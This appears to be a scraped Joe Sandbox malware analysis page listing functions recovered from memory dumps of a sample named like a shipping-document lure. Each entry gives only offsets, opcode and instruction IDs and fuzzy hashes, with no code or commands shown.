Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e6953c9e949df3f2b02c3384700b531f2c5f9369bca8628bf20fa3bac05aca4
Instruction ID: 5ce23a0f32e97d8da5f475e4f250a31c325d445e9947b4a6e042a409fc41a97d
Opcode Fuzzy Hash: 0e6953c9e949df3f2b02c3384700b531f2c5f9369bca8628bf20fa3bac05aca4
Instruction Fuzzy Hash: C0514430D01208DFDB14EFA9C9947DDBBF2BB49300F658429D824BB285DB31A881CF90

Function 0A15703C Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89c94714b2dd36b0390ad06b43aa10b0ed53d5d9da71ffccda234244a94aa8f8
Instruction ID: 172cf6cd7c98fc8531f847ca0f2d66ee63bb4c1975d7ab6a26812e609bd1fc07
Opcode Fuzzy Hash: 89c94714b2dd36b0390ad06b43aa10b0ed53d5d9da71ffccda234244a94aa8f8
Instruction Fuzzy Hash: 66513374D01208CFDB14EFB8D494AEDBBF2BB49300F658929D825BB285D735A881CF90

Function 04460006 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535347905.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4460000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc16367630ac964396334961a43118a934daac0cf7b0542c0fb4ee941ed9cd76
Instruction ID: 154df4bda0f2e005f163b4242980bf5418e12bbb54b02f12f76589bf121b12b8
Opcode Fuzzy Hash: cc16367630ac964396334961a43118a934daac0cf7b0542c0fb4ee941ed9cd76
Instruction Fuzzy Hash: 525148B0D052589FEB19CFAAC8943CEBFF2AF85314F14C06AD448AA296D774444ACF51

Function 06A93098 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31bfdfe2140b3a77b188bd4c6c6eb9d545898a110e3f20ae8311881bffef2508
Instruction ID: 60dfb2a3394b82ff99318f44937c58c4eed2b362fccb57cd4b68eca37d3b3233
Opcode Fuzzy Hash: 31bfdfe2140b3a77b188bd4c6c6eb9d545898a110e3f20ae8311881bffef2508
Instruction Fuzzy Hash: 9F51D674E002598FDF14DFA9C5805AEFBF2AF89305F24C1A9D418AB356D7319A41CFA1

Function 044D7AF6 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535763913.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_44d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b30ed4c1a10ac64212a9c3a60610f206ac4ee856e1a76e0964584dc88c187f36
Instruction ID: 76d6a9401842c642a715ff569124d642cecd9623a67a531aa952db3b868cab7a
Opcode Fuzzy Hash: b30ed4c1a10ac64212a9c3a60610f206ac4ee856e1a76e0964584dc88c187f36
Instruction Fuzzy Hash: 46518474E016088FDB48DFAAD99499DFBF2FF89300F14816AD419AB365EB30A941CF51

Function 0A157D13 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d9bd26a0676703f11a3ae65f715788c3331a59db4707224d2c27695a9c3b470
Instruction ID: 13f4d3d5d860c892471aaf277ea80e8c4db0c2e8c7c517366e13e3100a96a4ba
Opcode Fuzzy Hash: 1d9bd26a0676703f11a3ae65f715788c3331a59db4707224d2c27695a9c3b470
Instruction Fuzzy Hash: 80518E34A01228DFCB69DF24C854BA9B7B2BB4A305F5085EAD40EA7350DB359E81CF50

Function 044D0006 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535763913.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_44d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23f4438864a388e0920e7b83e770ee0b87254cf8648d6e5ff6428827c79efa0f
Instruction ID: 9be94a4e35b04176c2544bf5531f7bdef738fb7996ae97dfc37d556d14398b9a
Opcode Fuzzy Hash: 23f4438864a388e0920e7b83e770ee0b87254cf8648d6e5ff6428827c79efa0f
Instruction Fuzzy Hash: F9414A74D062488FDB09DFBAC9546DEFBF2AF8A304F24C06AC408AB256D7356946CF11

Function 04465070 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535347905.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4460000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 701fb3d2c83ba7a7a1b06a9e6c21226871a3ad1fb961c272a3cd577fefbaee7c
Instruction ID: 7fb251a545b99185085cff330fdbd734b8dadac65f2ac06cf4de11d5426c5324
Opcode Fuzzy Hash: 701fb3d2c83ba7a7a1b06a9e6c21226871a3ad1fb961c272a3cd577fefbaee7c
Instruction Fuzzy Hash: DB41F570E012089FEF18DFAAD5446EEBBF2AF89304F20D12AC415AB259DB355946CF51

Function 0446B910 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535347905.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4460000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e28575aa16cb138e89e5a69f0f9f8360af79f4dafd5c2e43e4721192ebb055e
Instruction ID: b54f4f82c899437ef30dec8da4ca4a994770ce5be3a5d8132c16985c332ac8e5
Opcode Fuzzy Hash: 0e28575aa16cb138e89e5a69f0f9f8360af79f4dafd5c2e43e4721192ebb055e
Instruction Fuzzy Hash: 57410470E01258CBEF18DFAAC4506EEBBF2EF89300F20D12AC015AB255EB356946CF11

Function 0446DD07 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535347905.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4460000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 148abecd835e9fe0df2524d230c8f8270c8124c2e0a0bfaf093f47e56f55b41d
Instruction ID: 383ed6ae41d63c6a5d8700abfb8ddbc442fa7b41fc141724f98af916ec54b64b
Opcode Fuzzy Hash: 148abecd835e9fe0df2524d230c8f8270c8124c2e0a0bfaf093f47e56f55b41d
Instruction Fuzzy Hash: 5541E274E012088FEF18DFAAC5546EEBBF2EF89304F20D12AC419AB259DB355946CF11

Function 04467788 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535347905.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4460000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91321296f70352baba9429e97d0956c884b580a7f09522fd5ad7bd283c78aada
Instruction ID: 7f4e38df7ec5eee8ed2a290b9e20242bc0e416753d6cd70c565455f2ab367fe8
Opcode Fuzzy Hash: 91321296f70352baba9429e97d0956c884b580a7f09522fd5ad7bd283c78aada
Instruction Fuzzy Hash: 6C41E474E012488FEF18DFAAC5546EEBBF2AF89304F20D02AC459AB255EB355946CF11

Function 04469A48 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535347905.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4460000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 370379c2c8b412d490a10874bdb7ce473de221480ac66935a2d6fa09a93c093a
Instruction ID: 4fb73eebb7deac651b41bb682d9ae82e92b72397c17d113403182a94aebb9ab9
Opcode Fuzzy Hash: 370379c2c8b412d490a10874bdb7ce473de221480ac66935a2d6fa09a93c093a
Instruction Fuzzy Hash: E541E4B4E01248CBEF18DFAAD5546EEBBF2AF89304F20D12AC419AB255DB355946CF01

Function 0446C61A Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535347905.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4460000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d20ea2d237c5426727b39749e2aa97ffe6e205382da6018de75ad2e0b8b447bd
Instruction ID: 1bab69f13485555bfa91d7711e622443ab5c313fd0792a06deaa025856e5dc25
Opcode Fuzzy Hash: d20ea2d237c5426727b39749e2aa97ffe6e205382da6018de75ad2e0b8b447bd
Instruction Fuzzy Hash: 1F411670E012488BEF18DFAAD4946EEBBF2AF89300F24D02AC459AB255DB355946CF15

Function 04468038 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535347905.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4460000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3230ece3f541d974d8a99f29f22c9edc15a4075f4f480082a9405e394241d84
Instruction ID: e29c1069b18cdb06fa545f6094f9b2717a5fe009e8b17e293c5fc363c7f7cb68
Opcode Fuzzy Hash: c3230ece3f541d974d8a99f29f22c9edc15a4075f4f480082a9405e394241d84
Instruction Fuzzy Hash: FA41E570E012488BEF18DFAAC9546DEBBF2BF89304F20D02AC415BB255EB355946CF11

Function 04466ED8 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535347905.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4460000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e98a806c1f7afb36c6cb8b128a163d1939b963a4b610c6d272b371831df7900d
Instruction ID: 8562673065d611fd88dbeb05724275d380a42b9d3e8bfaec6bb5ad5e3bb76999
Opcode Fuzzy Hash: e98a806c1f7afb36c6cb8b128a163d1939b963a4b610c6d272b371831df7900d
Instruction Fuzzy Hash: CB41D370E012488BEF18DFAAC5546EEFBF2AF89304F20D12AD419AB259DB355946CF11

Function 044688E9 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535347905.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4460000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c844e7a24b943309f6afa0b4919e23af359a0ebfe2111c9eb5a79f239497bd1d
Instruction ID: 9b4c31d6ddcc7623015e933bdce782016d3e2cea4e35f2519bd3322584025b4d
Opcode Fuzzy Hash: c844e7a24b943309f6afa0b4919e23af359a0ebfe2111c9eb5a79f239497bd1d
Instruction Fuzzy Hash: 9041F6B0E012488FEF18DFAAD5546EEBBF2AF89304F20D12AC415BB255DB355946CF11

Function 04468491 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535347905.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4460000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 090e041d7939a79cbc44b52176cc279e5733b1b10646c2dc68bdd2c6cc46d973
Instruction ID: f644c0a88fb831131dd7d79ff452a32458f51663a5a9890af32dadf27c117eae
Opcode Fuzzy Hash: 090e041d7939a79cbc44b52176cc279e5733b1b10646c2dc68bdd2c6cc46d973
Instruction Fuzzy Hash: C141E470E016488BEF18DFAAC9546EEBBF2BF89304F20D12AC419AB255DB355946CF11

Function 0446E160 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535347905.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4460000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e962cd2725892e2af906e046ba12577f3778a5c6a5c2db8d65b64c89fafc4577
Instruction ID: e394f60789e42eb149194f8b8ad16bd080a1bf730c2be3459e66bc4309bd0481
Opcode Fuzzy Hash: e962cd2725892e2af906e046ba12577f3778a5c6a5c2db8d65b64c89fafc4577
Instruction Fuzzy Hash: 2541E474E012488FEF18DFAAC5546DEBBF2AF89304F20D12AC419AB259EB355946CF11

Function 0446BD6A Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535347905.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4460000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb0a79ccaf581e4f6555805f6b5e09035c3513960b3d91ec51132c051e9c49b7
Instruction ID: 39f04f044f30c79a6e545b6c69d16c5aa8478ce898d32e0b4cc51347f1ff75a4
Opcode Fuzzy Hash: eb0a79ccaf581e4f6555805f6b5e09035c3513960b3d91ec51132c051e9c49b7
Instruction Fuzzy Hash: 8D41D574E012488FEF18DFAAC5946EEBBF2EF89300F20D12AD415AB255DB356946CF11

Function 04464368 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535347905.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4460000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fee3316fa6ce824107792370191628c7a63bd208ce446a005a74cea81ecaa1e
Instruction ID: e34e23787335dbcc4c7b26a7d2cdb75a6297759b6d7662e3a02679247600b1b6
Opcode Fuzzy Hash: 1fee3316fa6ce824107792370191628c7a63bd208ce446a005a74cea81ecaa1e
Instruction Fuzzy Hash: 6F410374E012088FEF18DFAAD5556DEBBF2AF89304F20D02AC419AB255EB345946CF05

Function 0446C1C0 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535347905.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4460000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e62b771fce2a0cfd2ef977c0f93b34b1d9ca1846de09c429f46c4834cb1979e
Instruction ID: e7e1a7725d84e786d458b5a5015402ad5f48e969c97a146642c41dd1fbc8beff
Opcode Fuzzy Hash: 6e62b771fce2a0cfd2ef977c0f93b34b1d9ca1846de09c429f46c4834cb1979e
Instruction Fuzzy Hash: 1E41E670D012489BEF18DFAAC4846DEFBF2AF89300F20D12AC415BB255DB355946CF55

Function 04467BE1 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535347905.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4460000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfbf75e53b1d754d7be15172bc412ba9259b1df2915b48b03feda2cd63837a88
Instruction ID: f595c3293168e58fd1415e4a19ec80b36c30eac56fa4368b3a3a14c1c4bd60b5
Opcode Fuzzy Hash: cfbf75e53b1d754d7be15172bc412ba9259b1df2915b48b03feda2cd63837a88
Instruction Fuzzy Hash: 6441D170E012488BEF18DFAAD5546EEFBF2AF89304F20D12AC419AB255EB355946CF11

Function 044695F1 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535347905.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4460000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63d24d1149d7b640245221140526448ed839e39ac63c6668e817d96d7d3f24b6
Instruction ID: cb4070c7a417511a0f3bfc9de3bc2dbc863a967a495de38254c6ac8751efcac3
Opcode Fuzzy Hash: 63d24d1149d7b640245221140526448ed839e39ac63c6668e817d96d7d3f24b6
Instruction Fuzzy Hash: 134105B0E01248CBEF18DFAAC5546EEFBF2AF89300F24D12AC419AB255DB355946CF41

Function 04469198 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535347905.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4460000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23411b2ea3646ac28e6c92b9ec6e52a6728bfda32d4836e8c88db8673885bcde
Instruction ID: 026da091c561340bb9baf99586a04fcf90d2bd0320a97aac9e62f8e1d0ba877c
Opcode Fuzzy Hash: 23411b2ea3646ac28e6c92b9ec6e52a6728bfda32d4836e8c88db8673885bcde
Instruction Fuzzy Hash: F84107B1E012488FEF18DFAAD4546DEFBF2AF89304F20D02AC419AB259DB355946CF01

Function 0446E5B9 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535347905.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4460000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd1bdb580700132ef7115880ac6fa28da9e2ca79eef08f7e6baec2a8f38a9fc0
Instruction ID: f7cfe1ea512d33aec37c2bceb966e5904b9a4f09169bfaee8f3e1dbd6e9ed047
Opcode Fuzzy Hash: bd1bdb580700132ef7115880ac6fa28da9e2ca79eef08f7e6baec2a8f38a9fc0
Instruction Fuzzy Hash: 9241F374E012088FEB58DFAAC9546EEBBF2AF89304F20D12AC419AB255DB355946CF41

Function 04464C18 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535347905.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4460000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 876559c746916002aad41f1f748714f7f9ce33beafe77efd06738f353a33864d
Instruction ID: 023d60fbc8e8e3ce5ecfb6a4a0b60733cf97d85226ba0cbc8a45824df9e5c2ec
Opcode Fuzzy Hash: 876559c746916002aad41f1f748714f7f9ce33beafe77efd06738f353a33864d
Instruction Fuzzy Hash: 91410370E012088FEF18DFAAD5546DEBBF2BF89300F20D12AC419AB259EB355946CF41

Function 04465922 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535347905.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4460000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7349516eb32243fdf61107bc219f34a06485b6f29a54dda4f8a157047fbd25aa
Instruction ID: 92bdd70b56da3d3178dd717d95e965c382f471b513c0da7a220d06aefa064395
Opcode Fuzzy Hash: 7349516eb32243fdf61107bc219f34a06485b6f29a54dda4f8a157047fbd25aa
Instruction Fuzzy Hash: 0C41E270E012089FEF18DFAAD5546DEBBF2AF89304F20D12AC419AB259EB355946CF11

Function 044661D0 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535347905.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4460000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30e9f47977c963ac3fd46d9da511c51d52254754b4d6ef072944e347fb9ec13c
Instruction ID: 658191b994933fa6c2e9169269271e05adad44e562ad71aedb09f3a09809aee6
Opcode Fuzzy Hash: 30e9f47977c963ac3fd46d9da511c51d52254754b4d6ef072944e347fb9ec13c
Instruction Fuzzy Hash: D341E470E012488BEF18DFAAD5546DEFBF2BF89304F20D12AC419AB259DB355946CF01

Function 04468D40 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535347905.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4460000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24f3190c548770008d580dd96ee382b9ca3d2f4eb4c5a4a78f3b22cd331247bb
Instruction ID: 43fe82655e9c0a674ef1ffe88c8bf2a2025fd7f4afc0706fac4fb37896c3dc7a
Opcode Fuzzy Hash: 24f3190c548770008d580dd96ee382b9ca3d2f4eb4c5a4a78f3b22cd331247bb
Instruction Fuzzy Hash: 0341E274E012488FEF18DFAAC9546EEBBF2AF89300F20D12AC419BB255DB355946CF51

Function 04467330 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535347905.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4460000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ceda5342f89307fd809d9195548fbe46888d8d347ef0c56363fcafaa7820c7d1
Instruction ID: 2b59d7a370e85d27f95685c2417d6433195c2735ccff9eac60afdb4b72a65b86
Opcode Fuzzy Hash: ceda5342f89307fd809d9195548fbe46888d8d347ef0c56363fcafaa7820c7d1
Instruction Fuzzy Hash: 2D41F674E012488BEF18DFBAD5546EEBBF2BF89304F20D12AC419AB259DB355946CF01

Function 044647C0 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535347905.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4460000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a63ab276a0fc1625acff56fef32b56c75f24d1a558cf0b2bb94b6e2fb9918552
Instruction ID: 9f02e8ebacc4394dad01e8b9892858d05fde8a9a4b118eeafb02ce2d8e66b6fd
Opcode Fuzzy Hash: a63ab276a0fc1625acff56fef32b56c75f24d1a558cf0b2bb94b6e2fb9918552
Instruction Fuzzy Hash: 72411570E012488BEF18DFAAC8546DEFBF2AF89300F20C02AC419BB255DB345946CF15

Function 04466629 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535347905.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4460000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cee08d94610efade0495bdaafb787c3ade9cdb0416ca12f6a48f188f904d049
Instruction ID: a43d9249efd395285df049cb8c97106eb656421e8258302e7545027c68321a62
Opcode Fuzzy Hash: 6cee08d94610efade0495bdaafb787c3ade9cdb0416ca12f6a48f188f904d049
Instruction Fuzzy Hash: 5541D2B0E012488FEF18DFAAD5546DEBBF2AF89304F24D12AC419AB259DB355946CF01

Function 044654C8 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535347905.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4460000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a80184a36a93ee67f03faf3269bf5e00a15cbb37b9ec37f314c85d5c0662c135
Instruction ID: de615d3cfaaee7b65d45d7f661fb05fb7d3bf0cc426806829eaff3f40482c38f
Opcode Fuzzy Hash: a80184a36a93ee67f03faf3269bf5e00a15cbb37b9ec37f314c85d5c0662c135
Instruction Fuzzy Hash: 9941F370E01248DBEF18DFBAD5546DEBBF2AF88300F20D12AC419AB259EB345946CF01

Function 0446CEC8 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535347905.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4460000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e0432162dc448443cff07c27976ac9e40a1ca7a33d067d79ead24c8f27c92e4
Instruction ID: a44f510fd41f71566ac9c4735c4e1881482654bbee2bd578e6e95fb2f0148b17
Opcode Fuzzy Hash: 0e0432162dc448443cff07c27976ac9e40a1ca7a33d067d79ead24c8f27c92e4
Instruction Fuzzy Hash: 3041D4B0E012089FEF18DFBAC5546DEBBF2AF89300F20D12AC419AB255DB345946CF51

Function 0446A2F9 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535347905.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4460000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca0b5e826776a386bebccce1676a54e88c73387cccd4b7c17ad82a3d54bd564d
Instruction ID: 896c264921f7c17ba86210a5b80c1c26bb8ec43429ceb4fa5676c863a9dc2922
Opcode Fuzzy Hash: ca0b5e826776a386bebccce1676a54e88c73387cccd4b7c17ad82a3d54bd564d
Instruction Fuzzy Hash: F241E370E016488BEF18DFAAD5546EEBBF2BF89304F20D12AC419BB255DB355946CF01

Function 04466A81 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535347905.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4460000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8e3224f689a5dbd197d9fc3513dbc6e4ceac78d695160ee1f8e121d174feeef
Instruction ID: 0c2a13a3fda9d4df50b4c5f016ca91732ded1821d48976cbac79804873f68788
Opcode Fuzzy Hash: e8e3224f689a5dbd197d9fc3513dbc6e4ceac78d695160ee1f8e121d174feeef
